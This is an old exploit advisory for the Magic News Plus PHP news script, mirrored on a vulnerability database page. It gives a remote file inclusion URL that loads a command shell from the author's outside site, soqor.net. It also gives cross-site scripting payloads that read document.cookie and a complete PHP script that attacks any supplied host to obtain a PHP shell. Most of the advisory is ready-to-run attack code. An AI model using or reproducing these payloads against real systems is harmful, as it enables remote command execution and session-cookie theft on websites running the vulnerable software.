Lucene search
K

magicnews-rfixss.txt

🗓️ 24 Feb 2007 00:00:00Reported by HACKERS PALType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Magic News Plus File Inclusion And Xss Vulnerability, Tested on v1.0.2, Discovered By : HACKERS PAL, Website : http://www.soqor.net

Code
`Hello,,  
  
Magic News Plus File Inclusion And Xss Vulnerabilitis  
  
Tested on v1.0.2 Any Other Version maybe Infected  
  
Discovered By : HACKERS PAL  
Copy rights : HACKERS PAL  
Website : http://www.soqor.net  
Email Address : [email protected]  
  
Remote File Inclusion  
preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/ss&cmd=dir  
  
Xss (Cross Site Scripting)  
news.php?GLOBALS[]=1&link_parameters="><script>alert(document.cookie);</script>  
n_layouts.php?link_parameters="><script>alert(document.cookie);</script>  
  
  
Exploit:-  
#!/usr/bin/php -q -d short_open_tag=on  
<?  
/*  
/* Magic News PHP Code Execution Exploit  
/* This exploit should allow you to execute commands  
/* By : HACKERS PAL  
/* WwW.SoQoR.NeT  
*/  
print_r('  
/**********************************************/  
/* Magic News Command Execution */  
/* by HACKERS PAL <[email protected]> */  
/* site: http://www.soqor.net */');  
if ($argc<2) {  
print_r('  
/* -- */  
/* Usage: php '.$argv[0].' host  
/* Example: */  
/* php '.$argv[0].' http://localhost/  
/**********************************************/  
');  
die;  
}  
error_reporting(0);  
ini_set("max_execution_time",0);  
  
$url=$argv[1]."/";  
$exploit="preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor";  
$page=$url.$exploit;  
Function get_page($url)  
{  
  
if(function_exists("file_get_contents"))  
{  
  
$contents = file_get_contents($url);  
  
}  
else  
{  
$fp=fopen("$url","r");  
while($line=fread($fp,1024))  
{  
$contents=$contents.$line;  
}  
  
  
}  
return $contents;  
}  
  
$newpage = get_page($page);  
  
if(eregi("Cannot execute a blank command",$newpage))  
{  
Die("\n[+] Exploit Finished\n[+] Go To : ".$url."preview.php?php_script_path=http://www.soqor.net/tools/cmd.txt?/soqor\n[+] You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
Else  
{  
Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT */\n/**********************************************/");  
}  
?>  
  
#WwW.SoQoR.NeT  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Feb 2007 00:00Current
7.4High risk
Vulners AI Score7.4
28